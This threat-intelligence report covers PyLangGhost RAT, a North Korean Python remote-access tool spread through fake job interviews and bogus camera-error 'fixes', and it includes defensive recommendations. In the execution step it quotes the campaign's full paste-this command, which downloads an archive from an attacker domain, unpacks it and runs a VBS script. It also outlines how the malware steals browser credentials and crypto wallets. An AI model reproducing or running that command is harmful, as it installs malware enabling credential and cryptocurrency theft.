North Korean state-sponsored groups continue to innovate in their campaigns against financial institutions and cryptocurrency platforms. A newly discovered malware, PyLangGhost RAT, has emerged as a Python-based reimplementation of GoLangGhost RAT, attributed to the Lazarus subgroup Famous Chollima.
Unlike traditional malware distributed through cracked software or removable media, PyLangGhost RAT relies on highly targeted social engineering tactics notably fake developer job interviews and staged business calls. Victims are tricked into executing malicious “fixes” for fabricated camera or microphone errors, ultimately granting full remote access to North Korean operators.
This discovery, credited to researcher Heiner García Pérez of BlockOSINT, highlights the evolving sophistication of DPRK’s “ClickFix” campaigns.
Threat Attribution
- Threat Actor: Lazarus Group – Subgroup “Famous Chollima”
- Targeted Sectors: Technology, Finance, and Cryptocurrency
- Motivation: Financial gain, cryptocurrency theft, espionage
- TTP Evolution: From bogus coding challenges and fake VC meetings to ClickFix scenarios where victims copy/paste malicious commands into terminals
Attack Chain Overview
- Initial Access – Fake job offers/interviews redirect victims to malicious sites.
- Social Engineering (ClickFix) – Users encounter fake errors (e.g., “Race Condition in Windows Camera Discovery Cache”).
- Execution – Victims copy/paste a malicious command:
curl -k -o"%TEMP%\nvidiaRelease.zip" https://360scanner.store/cam-v-b74si.fix&& powershell -Command "Expand-Archive -Force -Path'%TEMP%\nvidiaRelease.zip' -DestinationPath '%TEMP%\nvidiaRelease'"&& wscript "%TEMP%\nvidiaRelease\update.vbs"
- Persistence – Registry keys set via update.vbs.
- Payload Deployment – A disguised Python environment (csshost.exe) launches nvidia.py, importing malicious modules (config.py, api.py, command.py, util.py, auto.py).
- Data Theft – Browser-stored credentials and crypto wallet data exfiltrated.
- C2 Communication – Weak RC4/MD5 encryption over raw IP addresses with no TLS.
Malware Capabilities
- Credential Theft: Dumps Chrome-stored passwords and cookies (v10–v20+ bypass supported).
- Crypto Wallet Theft: Targets MetaMask, BitKeep, Coinbase Wallet, Phantom extensions.
- Privilege Escalation: Abuses deceptive UAC prompts and LSASS impersonation for SYSTEM-level access.
- Persistence: Registry-based, prevents multiple instances using pseudo-mutex mechanism.
- C2 Communication: No TLS, relies on obfuscated RC4 packets and raw IPs.
MITREATT&CK Mapping
- T1036 – Masquerading: Renames python.exe → csshost.exe
- T1059 – Command & Scripting Interpreter: Executes via wscript.exe and Python loader
- T1083 – File and Directory Discovery: Enumerates browser profiles and extensions
- T1012 – Query Registry: Gains persistence through registry keys
- T1555 – Credentials from Password Stores: Exfiltrates Chrome credentials and cookies
Business Impact
- Financial Losses: Direct theft of cryptocurrency assets.
- Data Breaches: Exposure of corporate and customer information.
- Operational Disruption: Remote control and potential lateral movement.
- Reputational Damage: Public association with a Lazarus breach erodes trust.
- Regulatory Risk: Non-compliance penalties (GDPR, CCPA, financial oversight).
Defensive Recommendations
- Awareness Training: Educate staff, especially developers and executives, about ClickFix social engineering tactics.
- Privilege Management: Restrict local admin rights; enforce least-privilege access.
- Network Monitoring: Detect anomalous outbound traffic to raw IPs and non-TLS RC4 communications.
- Endpoint Security: Deploy EDR solutions with behavior-based detection to flag suspicious use of wscript.exe and renamed binaries.
- Browser Hardening: Disable unused extensions; enforce secure storage policies for credentials.
- Incident Response: Establish a workflow for sandboxing suspicious scripts and verifying “technical fix” instructions received during interviews.
.jpg)
.png)
.png)